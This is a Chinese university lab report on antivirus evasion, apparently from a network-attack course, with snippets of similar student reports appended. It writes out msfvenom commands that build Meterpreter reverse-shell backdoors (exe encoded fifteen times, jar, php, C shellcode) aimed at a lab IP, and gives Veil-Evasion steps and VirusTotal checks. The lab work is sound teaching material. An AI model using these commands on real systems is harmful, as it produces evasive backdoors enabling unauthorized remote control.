2018-2019-2 网络对抗技术 201652287 Exp3 免杀原理与实践

2018-2019-2 网络对抗技术 201652287 Exp3 免杀原理与实践

**免杀**
- 一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。
- 要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何工作的。AV(Anti-virus)是很大一个产业。其中主要的技术人员基本有编制恶意软件的经验。
- 反过来也一样,了解了免杀的工具和技术,你也就具有了反制它的基础。

实验内容

任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧

1、使用msf编码器生成后门程序

2、使用virus total 进行测试

3、使用msf编码器编码15次后门程序,看看有何效果

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 15 -b ‘\x00’ LHOST=192.168.142.129 LPORT=5227 -f exe > met-encoded15.exe

4、使用msfvenom生成jar和php

msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.142.129 lport=5227 x> 20165227_backdoor_java.jar

msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.142.129 lport=5227 x> 20165227_backdoor.php

5、使用veil-evasion进行后门生成(安装耗时太久,各种问题)安装可参照Veil-Evasion安装

  • 在``Veil-Evasion文件夹下输入命令./Veil-Evasion.py``` 启动
  • 使用命令:use 然后 7 设置IP和端口
  • 使用generate 生成后门
  • 使用virus total 进行测试

6、利用shellcode编程

  • 生成shellcode msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.142.129 LPORT=5227 -f c

任务二:Linux平台交叉编译Windows应用

原文地址:https://www.cnblogs.com/zhuyue-study/p/10630782.html

时间: 2024-11-05 18:58:57

2018-2019-2 网络对抗技术 201652287 Exp3 免杀原理与实践的相关文章

2017-2018-4 20155317《网络对抗技术》EXP3 免杀原理与实践

2017-2018-4 20155317<网络对抗技术>EXP3 免杀原理与实践 一.问题回答 (1)杀软是如何检测出恶意代码的? (2)免杀是做什么? (3)免杀的基本方法有哪些? 2.实践 (1) 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧 首先尝试一下自己上个实验做出的后门程序 果然是不堪一击...拿去检测一下 装上veil尝试一下结果会如何 : 温馨提示一下,刚开始我是用的自己装的64的ka

2018-2019-2 网络对抗技术 20165228 Exp3 免杀原理与实践

2018-2019-2 网络对抗技术 20165228 Exp3 免杀原理与实践 免杀 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中需要使用到的技术. 要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何工作的.AV(Anti-virus)是很大一个产业.其中主要的技术人员基本有编制恶意软件的经验. 反过来也一样,了解了免杀的工具和技术,你也就具有了反制它的基础. 1.杀软是如何检测出恶意代码的? 基于特征码:杀软会将恶意代码中有明显特征的一部分作为特征码,并建立起特征库,在

20165101刘天野 2018-2019-2《网络对抗技术》Exp3 免杀原理与实践

20165101刘天野 2018-2019-2<网络对抗技术>Exp3 免杀原理与实践 1. 实践内容 1.1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧 1.1.1 使用msf编码器 输入命令msfvenom -h可查看相关用法: 编码一次命令如下(用-e参数编码 用-b参数去除坏字符'\00'): msfvenom -p windows/meterpreter/reverse_tcp -e x8

2019-2020-2 20175215丁文韬《网络对抗技术》Exp3 免杀原理与实践

一.恶意代码检测机制和免杀原理 由于老师实验指导书中有提到了,这部分内容不加赘述,只是提及一下. 1.恶意代码检测机制 1.1 基于特征码的检测 简单来说一段特征码就是一段或多段数据.如果一个可执行文件(或其他运行的库.脚本等)包含这样的数据则被认为是恶意代码. 1.2 启发式恶意软件检测 "When I see a bird that walks like a duck and swims like a duck and quacks like a duck, I call that bird

2019-2020-2 网络对抗技术 20175209 Exp3 免杀原理与实践

2019-2020-2 网络对抗技术 20175209 Exp3 免杀原理与实践 一.实验任务 方法 正确使用msf编码器 msfvenom生成如jar之类的其他文件 veil 加壳工具 使用C + shellcode编程 使用其他课堂未介绍方法 通过组合应用各种技术实现恶意代码免杀 (如果成功实现了免杀的,简单语言描述原理,不要截图.与杀软共生的结果验证要截图.) 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 二.基础问题回答 杀软是如何检测出恶意代码的 基于

2019-2020-2 20175226王鹏雲《网络对抗技术》Exp3 免杀原理与实践

2019-2020-2 20175226王鹏雲<网络对抗技术>Exp3 免杀原理与实践 实验内容 1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具.使用C + shellcode编程或使用其他课堂未介绍方法自己利用shellcode编程等免杀工具或技巧 2.通过组合应用各种技术实现恶意代码免杀 (如果成功实现了免杀的,简单语言描述原理,不要截图.与杀软共生的结果验证要截图.) 3.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明

2019-2020-2 20175334罗昕锐《网络对抗技术》Exp3 免杀原理与实践

2019-2020-2 20175334罗昕锐<网络对抗技术>Exp3 免杀原理与实践 1 实践说明 1.1实践内容 (1)正确使用msf编码器 (2)veil (3)加壳工具 (4)使用C + shellcode编程 (5)使用其他课堂未介绍方法 -(6)通过组合应用各种技术实现恶意代码免杀并用另一电脑实测,在杀软开启的情况下,可运行并回连成功 1.2基础知识 1.2.1免杀 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中需要使用到的技术 要做好免杀,就时清楚杀毒软件(恶意软

2019-2020-2 20175218陈敬勇 《网络对抗技术》 Exp3 免杀原理与实践

2019-2020-2 20175218陈敬勇 <网络对抗技术> Exp3 免杀原理与实践 一.实验任务 方法 正确使用msf编码器 msfvenom生成如jar之类的其他文件 veil 加壳工具 使用C + shellcode编程 使用其他课堂未介绍方法 通过组合应用各种技术实现恶意代码免杀 如果成功实现了免杀的,简单语言描述原理,不要截图.与杀软共生的结果验证要截图 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 二.实验准备 基础知识 Msfvenom使用

2019-2020-2 20175327《网络对抗技术》Exp3 免杀原理与实践

目录 一.学习目标 二.基础知识 1.1 恶意软件检测机制 1.1.1 基于特征码的检测 1.1.2 启发式恶意软件检测 1.1.3 基于行为的恶意软件检测 三.实验步骤 1.使用msf编码器msfvenom生成后门程序 (1)正确使用msf编码器 (2)msfvenom生成如jar之类的其他文件 (2)mfsvenom生成php文件 (3)veil (4)用shellcode编程生成后门程序 (5)加壳 加密壳(Hyperion) (6)使用其他课堂未介绍方法 2.通过组合应用各种技术实现恶意